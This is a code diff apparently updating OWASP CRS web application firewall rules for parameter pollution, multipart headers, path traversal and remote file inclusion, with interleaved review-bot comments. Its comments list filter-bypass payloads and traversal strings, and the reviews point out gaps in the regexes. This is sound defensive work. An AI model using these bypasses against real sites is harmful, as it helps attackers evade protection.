+# -=[ HTTP Parameter Pollution ]=-
+#
+# [ Rule Logic ]
+# Parameter pollution rule 921180 PL3 can by bypassed when a weak backend parameter
+# parser is ignoring additional characters in a parameter array name after the
+# closing of the array.
+# Rule 921210 PL3 prevents this by disallowing arbitrary strings after an array has
+# been closed or inbetween the square brackets in multidimensional arrays.
+# Please note that rule 921210 allows for 2-dimensional, but not for higher dimensional
+# arrays. If these are flagged as attacks, a rule exclusion will have to be
+# deployed; ideally for the parameter(s) in question.
+#
+# [ References ]
+# Private bug bounty in Spring 2022, findings Z05OZUCH.
+#
+# [ Payloads ]
+# * foo[1]a=bar&foo[1]b= - parameter parsers often cut after the closing of
+# the array. 921180 PL3 takes the full name, though.
+# This impediance mismatch allows for bypasses.
+# * foo[1]x[1]=bar&foo[1]x[2]= - extension of 1; this has the advantage that
+# the parameter name does end with "]" just like a valid array notation.
+#
+SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \
+ "id:921210,\
+ phase:2,\
+ pass,\
+ log,\
+ msg:'HTTP Parameter Pollution after detecting bogus char after parameter array',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/137/15/460',\
+ tag:'paranoia-level/3',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
+
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+#
+# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
+#
+
+# -=[ HTTP Parameter Pollution ]=-
+#
+# [ Rule Logic ]
+# Parameter pollution rule 921180 PL3 and 921210 PL3 can by bypassed if a
+# weak backend parameter parser ignores parameter array alltogether at
+# cuts parameter names at the first occurrence of the "[" character.
+# The rule 921220 PL4 prevents this by disallowing parameter array names.
 #
-# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+# If an application needs parameter array names, then this rule should be
+# disabled, ideally by issueing a rule exclusion for the parameter names
+# that need it.
 #
+# [ References ]
+# Private bug bounty in Spring 2022, finding 5UXE4RK0.
+#
+# [ Payloads ]
+# * foo[1]=bar&foo[2]=
+# * foo=bar&foo[1]=
+# * foo[1]=bar&foo[1]acb]= - this is an edge case that 921210 PL3 is not
+# able to catch since the parameter name ends with "]".
+#
+SecRule ARGS_NAMES "@rx \[" \
+ "id:921220,\
+ phase:2,\
+ pass,\
+ log,\
+ msg:'HTTP Parameter Pollution possible via array notation',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/137/15/460',\
+ tag:'paranoia-level/4',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-922-MULTIPART-ATTACK.conf b/rules/REQUEST-922-MULTIPART-ATTACK.conf
new file mode 100644
index 0000000000..5ba40a580b
--- /dev/null
+++ b/rules/REQUEST-922-MULTIPART-ATTACK.conf
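Review bot: Both new rules 921210 and 921220 put `%{TX.0}` in their logdata but neither carries the `capture` action, so TX.0 is empty or a stale capture left by an earlier rule; add `capture,\` after `phase:2,\` in each, as every other rule in this file that logs TX.0 does. They are also the only scoring rules in these hunks written as `pass,\ log,\` instead of `block,\`; under CRS's anomaly-scoring defaults the effect is the same, but it breaks the file's convention and should be aligned or explained in the comment. Minor: the 921210 comment says arrays of three or more dimensions are flagged, yet `foo[a][b][c]` matches neither branch of `(][^\]]+$|][^\]]+\[)` because `[^\]]+` cannot cross a `]`, so either the regex or the comment is off and a regression test would settle which.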
@@ -0,0 +1,97 @@
+# ------------------------------------------------------------------------
+# OWASP CRS ver.4.0.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2024 CRS project. All rights reserved.
+#
+# The OWASP CRS is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+# This file is to address the 3UWMWA6W vulnerability.
+# It requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports
+# of the security fixes in these versions) or a compatible engine supporting these changes.
+#
+# If you cannot upgrade ModSecurity, this file will cause ModSecurity to fail to start.
+# In that case, you can temporarily delete this file. However, you will be missing
+# protection from these rules. Therefore, we recommend upgrading your engine instead.
+
+# The rules in this file will be part of the 920 / 921 in the future.
+
+# Only allow specific charsets when using "_charset_"
+# Note: this is in phase:2 because these are headers that come in the body
+SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \
+ "id:922100,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Multipart content type global _charset_ definition is not allowed by policy',\
+ logdata:'Matched Data: %{ARGS._charset_}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-multipart-header',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'paranoia-level/1',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.922100_charset=|%{ARGS._charset_}|',\
+ chain"
+ SecRule TX:922100_CHARSET "!@within %{tx.allowed_request_content_type_charset}" \
+ "t:lowercase,\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# Only allow specific charsets same as Rule 920600
+# Note: this is in phase:2 because these are headers that come in the body
+#
+# Regular expression generated from regex-assembly/922110-chain1.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 922110-chain1 +SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \ + "id:922110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Illegal MIME Multipart Header content-type: charset parameter',\ + logdata:'Matched Data: %{TX.1} found within Content-Type multipart form',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/272/220',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + chain" + SecRule TX:1 "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used (see: https://www.rfc-editor.org/rfc/rfc7578#section-4.7) +# Note: this is in phase:2 because these are headers that come in the 
body
+SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \
+ "id:922120,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'Content-Transfer-Encoding was deprecated by rfc7578 in 2015 and should not be used',\
+ logdata:'Matched Data: %{TX.0}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-deprecated-header',\
+ tag:'OWASP_CRS',\
+ tag:'capec/272/220',\
+ tag:'paranoia-level/1',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
index 31d9f7fcb9..a1fd3e0110 100644
--- a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+++ b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
@@ -1,8 +1,9 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.3.0
+# OWASP CRS ver.4.0.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
-# The OWASP ModSecurity Core Rule Set is distributed under
+# The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
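Review bot: The 922120 regex `content-transfer-encoding:(.*)` is unanchored and admits no whitespace before the colon, unlike its sibling 922110 which uses `^content-type\s*:\s*(.*)$`; if the multipart parser passes a part header written as `Content-Transfer-Encoding : base64` through unchanged it is not flagged, while the header name occurring inside another part header's value (a filename, say) is. Aligning it to `"@rx ^content-transfer-encoding\s*:(.*)$"` closes both gaps and keeps the two rules consistent. Separately, the 922100 message says a global `_charset_` "is not allowed by policy", but its chained rule only scores when the value is outside `tx.allowed_request_content_type_charset`, so the msg over-states what is blocked and should read something like `_charset_ value not in allowed charset list`.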
@@ -13,10 +14,10 @@
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
-# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
 #
@@ -26,13 +27,18 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAf # # [ Encoded /../ Payloads ] # -SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" \ +# Regular expression generated from regex-assembly/930100.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 930100 +# +SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?i)(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[5-6]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))(?:\.(?:%0[0-1]|\?)?|\?\.?|%(?:2(?:(?:5(?:2|c0%25a))?e|%45)|c0(?:\.|%[25-6ae-f]e)|u(?:(?:ff0|002)e|2024)|%32(?:%(?:%6|4)5|E)|(?:e|f(?:(?:8|c%80)%8)?0%8)0%80%ae)|0x2e){2,3}(?:[/\x5c]|%(?:2(?:f|5(?:2f|5c|c(?:1%259c|0%25af))|%46)|5c|c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|(?:bg%q|(?:e|f(?:8%8)?0%8)0%80%a)f|u(?:221[5-6]|EFC8|F025|002f)|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|1u)|0x(?:2f|5c))" \ "id:930100,\ phase:2,\ block,\ capture,\ t:none,\ - msg:'Path Traversal Attack (/../)',\ + msg:'Path Traversal Attack (/../) or (/.../)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ 
tag:'application-multi',\
 tag:'language-multi',\
@@ -41,21 +47,30 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@r
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153/126',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
 #
-# [ Decoded /../ Payloads ]
+# [ Decoded /../ or /..;/ Payloads ]
+#
+# To prevent '..' from triggering, the regexp is split into two parts:
+# - ../
+# - /..
+# OR
+# - .../
+# - /...
+#
+# Semicolon added to prevent path traversal via reverse proxy mapping '/..;/' (Tomcat)
 #
-SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?:^|[\\/])\.\.(?:[\\/]|$)" \
+SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:/* "@rx (?:(?:^|[\x5c/;])\.{2,3}[\x5c/;]|[\x5c/;]\.{2,3}(?:[\x5c/;]|$))" \
 "id:930110,\
 phase:2,\
 block,\
 capture,\
 t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\
- msg:'Path Traversal Attack (/../)',\
+ msg:'Path Traversal Attack (/../) or (/.../)',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
 tag:'language-multi',\
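Review bot: The new 930110 regex keeps `\x5c` (backslash) and `;` in its separator classes, but the rule's transformation chain ends in `t:cmdLine`, which, as I read ModSecurity's definition of that transformation, deletes every backslash and turns `;` into a space before the regex runs. `/..;/` still matches because cmdLine also drops a space that precedes `/`, but `..\..\` collapses to `....` and then matches neither branch, so a Windows-style traversal in an engine-decoded ARGS value is only caught if 930100's encoded-form regex happens to see a separator around it. Either the backslash alternatives should be dropped and the comment should say that `\` forms are covered by 930100 only, or a transformation chain that preserves backslashes should be used; a regression test with `..\..\windows\win.ini` as a parameter value would pin whichever is intended. The 930110 SecRule continues past this hunk.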
@@ -64,23 +79,27 @@ SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153/126',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 multiMatch,\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
 #
 # -=[ OS File Access ]=-
 #
+# We check for OS file access with the help of a local file with OS files data.
+#
 # Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml
 #
+# If you wonder where support for Google OAuth2 has gone, see:
+# https://github.com/coreruleset/google-oauth2-plugin
 SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile lfi-os-files.data" \
 "id:930120,\
 phase:2,\
 block,\
 capture,\
- t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\
 msg:'OS File Access Attempt',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
@@ -91,10 +110,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153/126',\
 tag:'PCI/6.5.4',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
 #
 # -=[ Restricted File Access ]=-
@@ -104,10 +123,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
 #
 SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
 "id:930130,\
- phase:2,\
+ phase:1,\
 block,\
 capture,\
- t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\
 msg:'Restricted File Access Attempt',\
 logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
 tag:'application-multi',\
@@ -118,33 +137,62 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
 tag:'OWASP_CRS',\
 tag:'capec/1000/255/153/126',\
 tag:'PCI/6.5.4',\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
-# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
+#
+# -=[ OS File Access ]=-
+#
+# This is a stricter sibling of rule 930120.
+# This stricter sibling checks for OS file data in request headers referer and user-agent.
+# We check for OS file access with the help of a local file with OS files data.
+#
+# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml
+#
+SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-files.data" \
+ "id:930121,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,\
+ msg:'OS File Access Attempt in REQUEST_HEADERS',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-lfi',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153/126',\
+ tag:'PCI/6.5.4',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
-# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4"
"id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
-# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
index e5fbfe9951..6fc1f28c6f 100644
--- a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
+++ b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
@@ -1,8 +1,9 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.3.0
+# OWASP CRS ver.4.0.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2024 CRS project. All rights reserved.
 #
-# The OWASP ModSecurity Core Rule Set is distributed under
+# The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
 # Please see the enclosed LICENSE file for full details.
 # ------------------------------------------------------------------------
@@ -16,10 +17,10 @@
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
-SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
 #
-# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
 # -=[ Rule Logic ]=-
@@ -33,7 +34,7 @@ SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAf # http://projects.webappsec.org/Remote-File-Inclusion # http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html # -SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ +SecRule ARGS "@rx ^(?i:file|ftps?|https?)://(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \ "id:931100,\ phase:2,\ block,\ @@ -48,13 +49,12 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1 tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?):\/\/" \ +SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?)://" \ "id:931110,\ phase:2,\ block,\ @@ -69,11 +69,10 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/175/253',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ "id:931120,\ 
